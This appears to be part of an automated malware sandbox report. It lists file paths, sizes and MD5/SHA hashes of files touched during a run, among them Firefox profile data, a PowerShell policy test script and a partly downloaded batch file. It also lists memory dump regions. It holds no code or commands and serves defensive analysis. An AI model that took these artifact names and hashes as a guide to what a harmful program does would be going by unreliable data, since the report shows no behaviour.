C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3qt190sk.default-release\activity-stream.discovery_stream.json.tmp
Filesize
28KB

MD5
a803895234297186411f9932f6896feb

SHA1
05fd55834764b92e3152f847a739e5ecb19102b1

SHA256
00f89355bdd95af6715f813894bd450832c0e9e3b9e580f302fe23100bfa18dd

SHA512
19a40f6cfab49947646f65b96fb0044b1f30352ee3dd2167dfa2d2324360ebc24c80935cfab95ab18d8b7cbee5becbc728f47bf9dca63490ff5d454755846108

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwuwexqu.ydu.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\prefs-1.js
Filesize
6KB

MD5
396190b0ef36d0af9f217cd05726c324

SHA1
4dd6d898363c9988d8ef0dadef080d0b51dc28f3

SHA256
9a3d50ed86cbebaa2ac8b3e157b2f66644410001e37dbe563287875c844a0027

SHA512
868156cce0c2e3be256633456a1f2490eb3e45b666b74f3225275d0803a3b838a74377d6f201d56f39a3d62bd18fa1e609170650c35cb78106dff44dbd65b586

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\prefs-1.js
Filesize
7KB

MD5
3f21cbf8c82256bb82597d3d56ad5e0e

SHA1
b2b5882cefb0adaacdcb790a95bde9009377e14a

SHA256
a0b094304f4b2a518845dca53f44a6b09a2ba90dc505b5d85fbb9f8df245a2c0

SHA512
dc396138ee11211e0c026cb3a1ce72a30a1adcbfe347aad102d8b49403fdfa00e8f9f9f9f69fa22c3f34be35775e7df93b4991433d5971760eba8795180b15a3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
2KB

MD5
719c6b6853b325842ce7f92904856e23

SHA1
bd1666cd8044c49cd6d80869e6a31df0a4e172f0

SHA256
bfefd4854f7e527c7452ac62b735a86fd4b8fec14b8732d34cc9938c7ac1a17d

SHA512
9d6db9b9cb6d7b5b26f4c8c97fb8209487e3ee215ff9e98b8c97e12b75467be0447f31b1bd951a923423a2a41e709026007a9b6e9aed4c91aa62453fed9ccaa4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
6e359b09b17bcbca6f9b20801652d6bb

SHA1
43b531ec8010ef474caba8bc52f4d2d39e348434

SHA256
78511423b5fe4f7bc3889de464bdfed4daa3cbc48d072135b733463b97a01973

SHA512
f0bd143d10aa7aee5002919a5c062b259473681d422e878f9a6b7392b93bd1018a3086fccc68dc655c7224b38f34c44aa15b17d493546ba4bd8a8326fa299e0a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\sessionstore.jsonlz4
Filesize
2KB

MD5
9553c3add8e3744d810a86581f700051

SHA1
01cf58868b89096167fd4bfae754962ea2a10eb8

SHA256
94011447a5b6069041b4d73e3dc0fdc1c982a96a3ea90131e720d576b82fcd25

SHA512
6905c6fbd9f22921b8729a243a44449817ce8ade8e02614193c32c3c7dfb0d6ea46585c3ca9829493444ed0fd0050cbe11ebefc8f0561660411f358965ad6275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3qt190sk.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize
192KB

MD5
9259bf31424cbbee431069a2d018cde2

SHA1
5dd37ee69d699e0979e80df15e9e15fd9b8c54fc

SHA256
ce5a3884650e328a8ef32cae5ab25ca73650376716a95f98954df387816e2996

SHA512
167148f561fe3b10a7dae7dc408021283e91e81f90030910c773e2048de630b9d4783dddcb14a576bf2839b22e712010a488e4d8d88e0a4d7288590c71316523

Download Submit
C:\Users\Admin\Downloads\C6JXVI73.bat.part
Filesize
6KB

MD5
dd28cb17a1e4540852af1452696640d0

SHA1
d4a954bc2fbae13ad5b0f8f78ea13714a8a00a39

SHA256
0da69bfe85133738cfcd24c9381baeb0ff3c849b5fa995171407cc4a9ef1626b

SHA512
e9ad278709c73dcc0a136de9ab275a4506ef812d530eb27b6620738321261e6f41540c163b2d7d8ed4844df96ecf7970001f561b0f225a71532f13d3896701cd

Download Submit
memory/2124-150-0x00007FF8293E3000-0x00007FF8293E5000-memory.dmp

Filesize
8KB

Download
memory/2124-162-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-161-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-171-0x0000023BF7AE0000-0x0000023BF7B41000-memory.dmp

Filesize
388KB

Download
memory/2124-172-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-160-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-159-0x0000023BF75E0000-0x0000023BF7602000-memory.dmp

Filesize
136KB

Download
memory/2124-262-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-263-0x0000023BF8AB0000-0x0000023BF8DD4000-memory.dmp

Filesize
3.1MB

Download
memory/2124-264-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-265-0x00007FF8293E0000-0x00007FF829EA2000-memory.dmp

Filesize
10.8MB

Download
memory/2124-266-0x0000023BF8480000-0x0000023BF84D0000-memory.dmp

Filesize
320KB

Download
memory/2124-267-0x0000023BF8590000-0x0000023BF8642000-memory.dmp

Filesize
712KB

Download